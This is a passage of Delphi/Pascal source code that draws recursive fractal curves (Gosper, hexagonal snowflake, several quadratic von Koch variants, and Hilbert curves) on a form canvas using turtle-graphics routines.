MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Gosper' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Gosper } procedure HKoch8(level: integer); var TempColor: TColor; maxcolx, maxrowy, {GfColor,} lc, i, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; Xpoints, Ypoints: array[0..24] of Extended; { dupe ? } begin dec(level); turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 4.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[8] := X2; Ypoints[8] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-90); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-90); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; turn(90); step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(90); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin { Main block of } {GfColor := 4;} generator_size := 8; init_size := 6; initiator_x1[0] := -75; initiator_x1[1] := 75; initiator_x1[2] := 150; initiator_x1[3] := 75; initiator_x1[4] := -75; initiator_x1[5] := -150; initiator_x2[0] := 75; initiator_x2[1] := 150; initiator_x2[2] := 75; initiator_x2[3] := -75; initiator_x2[4] := -150; initiator_x2[5] := -75; initiator_y1[0] := 115; initiator_y1[1] := 115; initiator_y1[2] := 0; initiator_y1[3] := -115; initiator_y1[4] := -115; initiator_y1[5] := 0; initiator_y2[0] := 115; initiator_y2[1] := 0; initiator_y2[2] := -115; initiator_y2[3] := -115; initiator_y2[4] := 0; initiator_y2[5] := 115; if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; Textout(10, 10, 'Hexagonal Snowflake' + ' Level: ' + IStringer(Level)); { the real Hex } end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; Textout(10, 10, 'Hexagonal Snowflake' + ' Level: ' + IStringer(Level)); { the real Hex } {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Procedure } procedure qkoch8(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfcolor,} lc, i, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 4.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[8] := X2; Ypoints[8] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-90); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-90); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; turn(90); step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(90); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin {gfcolor:=4; } {pcxVGASetup;} generator_size := 8; init_size := 4; initiator_x1[0] := -130; initiator_x1[1] := 130; initiator_x1[2] := 130; initiator_x1[3] := -130; initiator_x2[0] := 130; initiator_x2[1] := 130; initiator_x2[2] := -130; initiator_x2[3] := -130; initiator_y1[0] := 130; initiator_y1[1] := 130; initiator_y1[2] := -130; initiator_y1[3] := -130; initiator_y2[0] := 130; initiator_y2[1] := -130; initiator_y2[2] := -130; initiator_y2[3] := 130; if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 8' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 8' + ' Level: ' + IStringer(Level)); {inc(GFColor);} bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Von Koch8 } procedure qkoch18(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfcolor,} lc, i, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 6.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[18] := X2; Ypoints[18] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-90); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; turn(-90); step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(-90); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; turn(90); step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; turn(90); step; Xpoints[9] := turtle_x; Ypoints[9] := turtle_y; step; Xpoints[10] := turtle_x; Ypoints[10] := turtle_y; turn(-90); step; Xpoints[11] := turtle_x; Ypoints[11] := turtle_y; turn(-90); step; Xpoints[12] := turtle_x; Ypoints[12] := turtle_y; turn(90); step; Xpoints[13] := turtle_x; Ypoints[13] := turtle_y; turn(90); step; Xpoints[14] := turtle_x; Ypoints[14] := turtle_y; step; Xpoints[15] := turtle_x; Ypoints[15] := turtle_y; turn(90); step; Xpoints[16] := turtle_x; Ypoints[16] := turtle_y; step; Xpoints[17] := turtle_x; Ypoints[17] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin {175} {*0.729} MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin {gfcolor:=4; } {pcxVGASetup;} generator_size := 18; init_size := 4; initiator_x1[0] := -130; initiator_x1[1] := 130; initiator_x1[2] := 130; initiator_x1[3] := -130; initiator_x2[0] := 130; initiator_x2[1] := 130; initiator_x2[2] := -130; initiator_x2[3] := -130; initiator_y1[0] := 130; initiator_y1[1] := 130; initiator_y1[2] := -130; initiator_y1[3] := -130; initiator_y2[0] := 130; initiator_y2[1] := -130; initiator_y2[2] := -130; initiator_y2[3] := 130; if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 18' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 18' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Von Koch 18 } procedure qkoch32(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfcolor,} lc, i, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; Xpoints, Ypoints: array[0..32] of Extended; begin dec(level); turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 8.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[32] := X2; Ypoints[32] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; turn(90); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(-90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(90); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(90); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; turn(-90); step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; turn(-90); step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; turn(90); step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; turn(-90); step; Xpoints[9] := turtle_x; Ypoints[9] := turtle_y; turn(-90); step; Xpoints[10] := turtle_x; Ypoints[10] := turtle_y; step; Xpoints[11] := turtle_x; Ypoints[11] := turtle_y; turn(-90); step; Xpoints[12] := turtle_x; Ypoints[12] := turtle_y; turn(90); step; Xpoints[13] := turtle_x; Ypoints[13] := turtle_y; turn(90); step; Xpoints[14] := turtle_x; Ypoints[14] := turtle_y; step; Xpoints[15] := turtle_x; Ypoints[15] := turtle_y; turn(-90); step; Xpoints[16] := turtle_x; Ypoints[16] := turtle_y; step; Xpoints[17] := turtle_x; Ypoints[17] := turtle_y; turn(90); step; Xpoints[18] := turtle_x; Ypoints[18] := turtle_y; step; Xpoints[19] := turtle_x; Ypoints[19] := turtle_y; turn(-90); step; Xpoints[20] := turtle_x; Ypoints[20] := turtle_y; turn(-90); step; Xpoints[21] := turtle_x; Ypoints[21] := turtle_y; turn(90); step; Xpoints[22] := turtle_x; Ypoints[22] := turtle_y; step; Xpoints[23] := turtle_x; Ypoints[23] := turtle_y; turn(90); step; Xpoints[24] := turtle_x; Ypoints[24] := turtle_y; turn(90); step; Xpoints[25] := turtle_x; Ypoints[25] := turtle_y; turn(-90); step; Xpoints[26] := turtle_x; Ypoints[26] := turtle_y; step; Xpoints[27] := turtle_x; Ypoints[27] := turtle_y; turn(90); step; Xpoints[28] := turtle_x; Ypoints[28] := turtle_y; turn(90); step; Xpoints[29] := turtle_x; Ypoints[29] := turtle_y; turn(-90); step; Xpoints[30] := turtle_x; Ypoints[30] := turtle_y; turn(-90); step; Xpoints[31] := turtle_x; Ypoints[31] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin generator_size := 32; init_size := 4; initiator_x1[0] := -100; initiator_x1[1] := 100; initiator_x1[2] := 100; initiator_x1[3] := -100; initiator_x2[0] := 100; initiator_x2[1] := 100; initiator_x2[2] := -100; initiator_x2[3] := -100; initiator_y1[0] := 100; initiator_y1[1] := 100; initiator_y1[2] := -100; initiator_y1[3] := -100; initiator_y2[0] := 100; initiator_y2[1] := -100; initiator_y2[2] := -100; initiator_y2[3] := 100; if level < 0 then level := 0 else if level > 8 then level := 8; {gfcolor:=4;} {pcxVGASetup;} if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 32' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 3 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 32' + ' Level: ' + IStringer(Level)); {inc(GFColor);} bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Von Koch 32 } procedure qkoch50(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfcolor,} lc, i, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; Xpoints, Ypoints: array[0..50] of Extended; begin dec(level); turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 10.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[50] := X2; Ypoints[50] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-90); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-90); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(90); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; turn(-90); step; Xpoints[9] := turtle_x; Ypoints[9] := turtle_y; step; Xpoints[10] := turtle_x; Ypoints[10] := turtle_y; turn(90); step; Xpoints[11] := turtle_x; Ypoints[11] := turtle_y; turn(90); step; Xpoints[12] := turtle_x; Ypoints[12] := turtle_y; step; Xpoints[13] := turtle_x; Ypoints[13] := turtle_y; step; Xpoints[14] := turtle_x; Ypoints[14] := turtle_y; turn(90); step; Xpoints[15] := turtle_x; Ypoints[15] := turtle_y; step; Xpoints[16] := turtle_x; Ypoints[16] := turtle_y; turn(-90); step; Xpoints[17] := turtle_x; Ypoints[17] := turtle_y; step; Xpoints[18] := turtle_x; Ypoints[18] := turtle_y; step; Xpoints[19] := turtle_x; Ypoints[19] := turtle_y; step; Xpoints[20] := turtle_x; Ypoints[20] := turtle_y; turn(-90); step; Xpoints[21] := turtle_x; Ypoints[21] := turtle_y; turn(-90); step; Xpoints[22] := turtle_x; Ypoints[22] := turtle_y; step; Xpoints[23] := turtle_x; Ypoints[23] := turtle_y; step; Xpoints[24] := turtle_x; Ypoints[24] := turtle_y; turn(90); step; Xpoints[25] := turtle_x; Ypoints[25] := turtle_y; step; Xpoints[26] := turtle_x; Ypoints[26] := turtle_y; turn(-90); step; Xpoints[27] := turtle_x; Ypoints[27] := turtle_y; step; Xpoints[28] := turtle_x; Ypoints[28] := turtle_y; step; Xpoints[29] := turtle_x; Ypoints[29] := turtle_y; turn(90); step; Xpoints[30] := turtle_x; Ypoints[30] := turtle_y; turn(90); step; Xpoints[31] := turtle_x; Ypoints[31] := turtle_y; step; Xpoints[32] := turtle_x; Ypoints[32] := turtle_y; step; Xpoints[33] := turtle_x; Ypoints[33] := turtle_y; step; Xpoints[34] := turtle_x; Ypoints[34] := turtle_y; turn(90); step; Xpoints[35] := turtle_x; Ypoints[35] := turtle_y; step; Xpoints[36] := turtle_x; Ypoints[36] := turtle_y; turn(-90); step; Xpoints[37] := turtle_x; Ypoints[37] := turtle_y; step; Xpoints[38] := turtle_x; Ypoints[38] := turtle_y; step; Xpoints[39] := turtle_x; Ypoints[39] := turtle_y; turn(-90); step; Xpoints[40] := turtle_x; Ypoints[40] := turtle_y; turn(-90); step; Xpoints[41] := turtle_x; Ypoints[41] := turtle_y; step; Xpoints[42] := turtle_x; Ypoints[42] := turtle_y; turn(90); step; Xpoints[43] := turtle_x; Ypoints[43] := turtle_y; step; Xpoints[44] := turtle_x; Ypoints[44] := turtle_y; turn(-90); step; Xpoints[45] := turtle_x; Ypoints[45] := turtle_y; step; Xpoints[46] := turtle_x; Ypoints[46] := turtle_y; step; Xpoints[47] := turtle_x; Ypoints[47] := turtle_y; turn(90); step; Xpoints[48] := turtle_x; Ypoints[48] := turtle_y; turn(90); step; Xpoints[49] := turtle_x; Ypoints[49] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin {gfcolor:=4; } generator_size := 50; init_size := 4; initiator_x1[0] := -100; initiator_x1[1] := 100; initiator_x1[2] := 100; initiator_x1[3] := -100; initiator_x2[0] := 100; initiator_x2[1] := 100; initiator_x2[2] := -100; initiator_x2[3] := -100; initiator_y1[0] := 100; initiator_y1[1] := 100; initiator_y1[2] := -100; initiator_y1[3] := -100; initiator_y2[0] := 100; initiator_y2[1] := -100; initiator_y2[2] := -100; initiator_y2[3] := 100; if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 50' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 2 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 50' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Von Koch 50 } procedure hilbert(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfColor,} lc, i: integer; x1, x2, y1, y2, r, temp: Extended; procedure generate(r1: Extended; r2: Extended); begin dec(level); if level > 0 then generate(r2, r1); x2 := x2 + r1; y2 := y2 + r2; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := x2; y1 := y2; if level > 0 then generate(r1, r2); x2 := x2 + r2; y2 := y2 + r1; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := x2; y1 := y2; if level > 0 then generate(r1, r2); x2 := x2 - r1; y2 := y2 - r2; MainForm.Image2.Canvas.Moveto(Round(x1 + 320), Round(240 - y1)); MainForm.Image2.Canvas.Lineto(Round(x2 + 320), Round(240 - y2)); x1 := x2; y1 := y2; if level > 0 then generate(-r2, -r1); inc(level); end; begin {gfColor:=4; } if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Hilbert' + ' Level: ' + IStringer(Level)); Brush.Color := TempColor; MainForm.Show; temp := 2; i := level; while i > 1 do begin temp := temp * 2; dec(i); end; r := 400 / temp; x1 := -200; y1 := -200; x2 := -200; y2 := -200; generate(r, 0); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Brush.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Hilbert' + ' Level: ' + IStringer(Level)); Brush.Color := TempColor; MainForm.Show; temp := 2; i := level; while i > 1 do begin temp := temp * 2; dec(i); end; r := 400 / temp; x1 := -200; y1 := -200; x2 := -200; y2 := -200; generate(r, 0); {inc(GFColor);} bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Procedure } procedure hilbert2(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfColor, } I, lc, x, y, old_x, old_y, h: integer; procedure gen2(i: integer); forward; procedure gen3(i: integer); forward; procedure gen4(i: integer); forward; procedure gen1(i: integer); begin if i > 0 then begin gen4(i - 1); x := x - h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} old_x := x; old_y := y; gen1(i - 1); y := y - h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} old_x := x; old_y := y; gen1(i - 1); x := x + h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} old_x := x; old_y := y; gen2(i - 1); end; end; procedure gen2(i: integer); begin if i > 0 then begin gen3(i - 1); y := y + h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} old_x := x; old_y := y; gen2(i - 1); x := x + h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} old_x := x; old_y := y; gen2(i - 1); y := y - h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} old_x := x; old_y := y; gen1(i - 1); end; end; procedure gen3(i: integer); begin if i > 0 then begin gen2(i - 1); x := x + h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} old_x := x; old_y := y; gen3(i - 1); y := y + h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} { Line(old_x+320,240-(old_y*32) div 48,x+320,240-(y*32) div 48);} old_x := x; old_y := y; gen3(i - 1); x := x - h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} { Line(old_x+320,240-(old_y*32) div 48,x+320,240-(y*32) div 48);} old_x := x; old_y := y; gen4(i - 1); end; end; procedure gen4(i: integer); begin if i > 0 then begin gen1(i - 1); y := y - h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} { Line(old_x+320,240-(old_y*32) div 48,x+320,240-(y*32) div 48);} old_x := x; old_y := y; gen4(i - 1); x := x - h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} { Line(old_x+320,240-(old_y*32) div 48,x+320,240-(y*32) div 48);} old_x := x; old_y := y; gen4(i - 1); y := y + h; MainForm.Image2.Canvas.Moveto(old_x + 320, 240 - old_y); {(old_y*32) div 48} MainForm.Image2.Canvas.Lineto(x + 320, 240 - y); {(y*32) div 48} { Line(old_x+320,240-(old_y*32) div 48,x+320,240-(y*32) 